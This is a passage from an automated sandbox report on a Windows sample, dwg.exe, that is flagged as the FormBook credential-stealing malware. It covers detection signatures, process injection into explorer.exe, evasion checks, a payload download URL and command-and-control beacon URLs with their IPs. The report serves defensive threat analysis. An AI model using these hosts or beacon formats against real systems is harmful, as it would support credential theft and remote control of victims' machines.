      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564B00 cpuid 1_2_00564B00

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6456, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358411 Sample: dwg.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 29 www.qionglaizhan.com 2->29 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 5 other signatures 2->45 11 dwg.exe 1 2->11         started        signatures3 process4 signatures5 55 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->55 57 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->57 59 Tries to detect Any.run 11->59 61 3 other signatures 11->61 14 dwg.exe 6 11->14         started        process6 dnsIp7 37 45.153.203.33, 49716, 80 NETLABFR Netherlands 14->37 63 Modifies the context of a thread in another process (thread injection) 14->63 65 Tries to detect Any.run 14->65 67 Maps a DLL or memory area into another process 14->67 69 3 other signatures 14->69 18 explorer.exe 6 14->18 injected signatures8 process9 dnsIp10 31 www.guillemaudexcellenceauto.com 146.148.189.216, 49733, 80 HENGTONG-IDC-LLCUS United States 18->31 33 delmarranch.com 34.102.136.180, 49727, 80 GOOGLEUS United States 18->33 35 11 other IPs or domains 18->35 47 System process connects to network (likely due to code injection or exploit) 18->47 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      dwg.exe28%ReversingLabsWin32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      13.2.rundll32.exe.4927960.5.unpack100%AviraTR/Dropper.GenDownload File
      13.2.rundll32.exe.6843e8.1.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      www.apkiinsurance.com0%VirustotalBrowse
      www.guillemaudexcellenceauto.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.thakehamwesthorsley.com/gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.buytgp.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://45.153.203.33/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.karatetheokinawaway.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA0%Avira URL Cloudsafe
      http://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS0%Avira URL Cloudsafe
      http://45.153.203.33/mb.bin0%Avira URL Cloudsafe
      http://www.delmarranch.com/gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://45.153.203.33/53321935-2125563209-4053062332-10020%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      https://www.123-reg-new-domain.co.uk/iframe.html0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://45.153.203.33/mb.bintSkm0%Avira URL Cloudsafe
      http://45.153.203.33/mb.binI;0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.guillemaudexcellenceauto.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      delmarranch.com
      		34.102.136.180
      		truetrue
        		unknown
        www.qionglaizhan.com
        		47.110.53.154
        		truetrue
          		unknown
          www.apkiinsurance.com
          		104.21.56.93
          		truetrueunknown
          www.guillemaudexcellenceauto.com
          		146.148.189.216
          		truetrueunknown
          www.thakehamwesthorsley.com
          		94.136.40.51
          		truetrue
            		unknown
            www.karatetheokinawaway.com
            		94.136.40.51
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                bestcroissantinlondon.com
                		192.0.78.25
                		truetrue
                  		unknown
                  www.buytgp.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.scriptureonhealing.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.youridealworld.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.delmarranch.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.bestcroissantinlondon.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.thakehamwesthorsley.com/gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.buytgp.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5catrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.karatetheokinawaway.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRAtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xStrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://45.153.203.33/mb.bintrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.delmarranch.com/gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.guillemaudexcellenceauto.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmttrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFtyrundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://45.153.203.33/dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://45.153.203.33/53321935-2125563209-4053062332-1002dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.123-reg-new-domain.co.uk/iframe.htmlrundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                              		high
                                              http://45.153.203.33/mb.bintSkmdwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://45.153.203.33/mb.binI;dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fonts.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                192.0.78.25
                                                		unknownUnited States
                                                		2635AUTOMATTICUStrue
                                                146.148.189.216
                                                		unknownUnited States
                                                		26658HENGTONG-IDC-LLCUStrue
                                                23.227.38.74
                                                		unknownCanada
                                                		13335CLOUDFLARENETUStrue
                                                34.102.136.180
                                                		unknownUnited States
                                                		15169GOOGLEUStrue
                                                104.21.56.93
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUStrue
                                                45.153.203.33
                                                		unknownNetherlands
                                                		35251NETLABFRtrue
                                                94.136.40.51
                                                		unknownUnited Kingdom
                                                		20738GD-EMEA-DC-LD5GBtrue
                                                47.110.53.154
                                                		unknownChina
                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:358411
                                                Start date:25.02.2021
                                                Start time:15:33:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:dwg.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:27
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/0@13/8
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 49.4% (good quality ratio 43.1%)
                                                • Quality average: 71.6%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 162
                                                • Number of non-executed functions: 30
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 93.184.220.29, 51.104.139.180, 52.147.198.201, 104.42.151.234, 23.211.6.115, 13.64.90.137, 184.30.20.56, 51.104.144.132, 2.20.142.210, 2.20.142.209, 51.103.5.159, 92.122.213.247, 92.122.213.194, 142.250.180.147, 52.155.217.156, 20.54.26.129
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                192.0.78.25dwg.exeGet hashmaliciousBrowse
                                                • www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV
                                                IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                • www.wmarquezy.com/bw82/?9rjHF6y=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YeEGiH+FcCyQowbqQ==&lX9d=p48hVnrp1tqPRT7P
                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?RFQx_=9eHfuSy5bsinEXEf9UcXOob2js7MmdckS7hVoe2yzKUXnEaN1LaM8/a2W/lIeY/LicAkBw==&GZopM=kvuD_XrpiP
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • www.vagrantmind.com/gypo/?UrjPuprX=a22oXTEFK1VaKxP6jotNX9moxeWCA++9mvVJflp0ux1+Oqp3qAY+htsSgKT64ou7evePhg==&nnLx=UBZp3XKPefjxdB
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • www.alexcristal.com/kre/?FDHHVLz=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlPxZTSDnQnyx&Rb=VtX4-
                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                • www.alexcristal.com/kre/?aR-8_FK0=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlMRjDDjfKAT2&UlPt=DVohLl3xOrmlMF
                                                po.exeGet hashmaliciousBrowse
                                                • www.spanishjaponia.com/wtb/?tdcxfR=/SLohMkaSme8KQmscEO5zyeff+NH4C7nb7Kbu7K9qBGaaLOXNqJ/IyUS4tswlt55UVBx&DxoHn=2daDG
                                                SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                • www.brightandfreshfaces.com/css/?X2MhMfE0=ZN3ViUDOzxg5uhKqZwbFMgY8qo8vAnJC8OVwb1xkx9iwE6Y5op56c5mUT7DJAYlQEeIN&8p=EZTP7L
                                                FEB_2021.EXEGet hashmaliciousBrowse
                                                • www.leadeligey.com/bw82/?rp=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ&RR=YrHlp8D
                                                VESSEL SPECIFICATION 2021.exeGet hashmaliciousBrowse
                                                • www.v-surf-boards.com/thg/?hdmTvBAH=vedIkwMGAXbyu6oNrwAvvXp483A8bH0EhwZ5FQQQ4sr9cn5ccMruY6e7Q8V7TpjHwSYA&BR-tMX=XPJtkJ38
                                                Docs.exeGet hashmaliciousBrowse
                                                • www.w-ciszy-serca.com/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=HhP/jN+N/sXTaZ8/3fGnc0oK8/ih6OJXlCeyiM3x1xpWLsZL7bbd6eZCGkHpoe1MVPjf
                                                8nxKYwJna8.exeGet hashmaliciousBrowse
                                                • www.treningi-enduro.com/csv8/?OjKL3=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&UT=EhUhb4
                                                Xi4vVgHekF.exeGet hashmaliciousBrowse
                                                • www.newfacesatv.info/rina/?GFQL=ppFJhxZ/poTzDSMGT1HJyUg3NUxhm/dyZyRA539kIehONzPOa9y11HW9paxI3u+DZB07&wFN0DX=UtX8E
                                                hkcmd.exeGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?FVWl=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&AlO=O2MtmfRxc
                                                2Debit Note_OwnersInvoices.exeGet hashmaliciousBrowse
                                                • www.kazancsere.net/ivay/?NrQLEP=D48x&1bz=aaBEw9Yir1+hkeWoWLH1LjL9H2PhIHEM/4MpJ31it9FOz57KTCmY8+Kffl97ACZ0KQ0a
                                                YWrrcqVAno.exeGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?u8iLW=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&OhNhA=9rUlSVPXQJJ
                                                j64eIR1IEK.exeGet hashmaliciousBrowse
                                                • www.treningi-enduro.com/csv8/?Bz=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&R0G=dhrxP2v88TRtsx
                                                Order confirmation 64236000000025 26.01.2021.exeGet hashmaliciousBrowse
